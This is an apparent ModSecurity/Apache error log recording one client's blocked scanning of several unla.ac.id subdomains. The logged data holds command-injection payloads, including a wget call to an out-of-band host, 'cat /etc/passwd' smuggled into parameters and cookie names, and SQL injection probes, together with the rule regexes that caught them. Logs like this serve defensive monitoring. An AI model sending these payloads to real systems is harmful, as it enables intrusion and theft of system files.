[Tue Aug 29 11:33:32.420765 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARy-vcAAAAb"]
[Tue Aug 29 11:33:32.461409 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgycehqnuwe1s8z.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARy-vkAAAAb"]
[Tue Aug 29 11:33:33.368869 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11HcCo-f0AAARo80AAAAAT"]
[Tue Aug 29 11:33:34.313100 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11HsCo-f0AAARnmJ4AAAAR"]
[Tue Aug 29 11:33:34.344219 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAASBXQAAAAAM"]
[Tue Aug 29 11:33:34.344817 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAAR@KFsAAAAF"]
[Tue Aug 29 11:33:34.347671 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HsCo-f0AAARNk-sAAAAS"]
[Tue Aug 29 11:33:34.352079 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARjjNgAAAAL"]
[Tue Aug 29 11:33:34.352479 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAAQKOmsAAAAs"]
[Tue Aug 29 11:33:34.355224 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARt-@4AAAAV"]
[Tue Aug 29 11:33:35.322702 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAAR@KF0AAAAF"]
[Tue Aug 29 11:33:35.323445 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARnmKEAAAAR"]
[Tue Aug 29 11:33:35.327916 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAASBXQMAAAAM"]
[Tue Aug 29 11:33:35.329656 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARQ3-MAAAAB"]
[Tue Aug 29 11:33:35.331631 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARLXy4AAAAQ"]
[Tue Aug 29 11:33:35.369744 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARQ3-UAAAAB"]
[Tue Aug 29 11:33:35.371545 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARo80UAAAAT"]
[Tue Aug 29 11:33:35.378927 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARA7hoAAAAA"]
[Tue Aug 29 11:33:35.379524 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARNlAAAAAAS"]
[Tue Aug 29 11:33:35.379845 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAAQKOm4AAAAs"]
[Tue Aug 29 11:33:35.393077 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAAOJKewAAAAE"]
[Tue Aug 29 11:33:35.399733 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAAQKOm8AAAAs"]
[Tue Aug 29 11:33:35.404839 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARNlAEAAAAS"]
[Tue Aug 29 11:33:35.406874 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAASBXQcAAAAM"]
[Tue Aug 29 11:33:35.412587 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARQ3-cAAAAB"]
[Tue Aug 29 11:33:36.328657 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARNlAIAAAAS"]
[Tue Aug 29 11:33:36.329489 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAASAHacAAAAH"]
[Tue Aug 29 11:33:36.330982 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARA7hwAAAAA"]
[Tue Aug 29 11:33:36.332456 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARy-vsAAAAb"]
